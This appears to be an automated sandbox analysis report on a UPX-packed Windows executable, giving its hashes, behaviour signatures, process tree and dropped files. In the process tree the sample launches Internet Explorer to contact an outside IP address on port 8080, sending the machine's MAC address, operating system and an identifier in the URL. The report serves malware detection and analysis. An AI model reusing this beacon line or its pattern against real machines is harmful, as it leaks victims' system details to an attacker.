Analysis

  • max time kernel
    144s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03/10/2022, 06:47

General

  • Target

    c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe

  • Size

    55KB

  • MD5

    6214ac19576dc2c193b5c8b4808a25a1

  • SHA1

    4dfe06481de5046215a9989c1089ac81727bf530

  • SHA256

    c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15

  • SHA512

    a0a7a59573d8a8ce1b120e2dae55917df802814d885357409211abc133a403a34bae1248f801ebb2fb72d20f7ba56a0ef88e1d4796f4fea601e5b9e5d0910414

  • SSDEEP

    1536:qaREAVLhLiM/xhfMLzaLa6hIAsdxn6sM0TZMl9Ve:BvLJTphfKp6hIAsdxn6sM0TZMl9Ve

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Modifies registry class 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe
    "C:\Users\Admin\AppData\Local\Temp\c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=fe-41-81-1c-61-f5&os=Microsoft Windows XP&flag=659f6252b80304b314258e8cbef28608&user=c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1564

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UBWW3XGF.txt

          Filesize

          608B

          MD5

          8634d0a867168375b796331433d0186b

          SHA1

          ecaa0627f0448dc38f64de63489e3b32e09836e3

          SHA256

          b7f282cd815a3d2fb4f76985ab992f830a1052bb463169ecb2ec6282303652fd

          SHA512

          19607ccc9e516a4057131a3ec623bd84cc3b637a21f5d60d26fddd6b2f318f370daa6554475ceb9d29f7415fe9fc148303a1ab4c73a813197e22a84f54c07484

        • memory/2000-54-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2000-55-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

          Filesize

          8KB

        • memory/2000-56-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB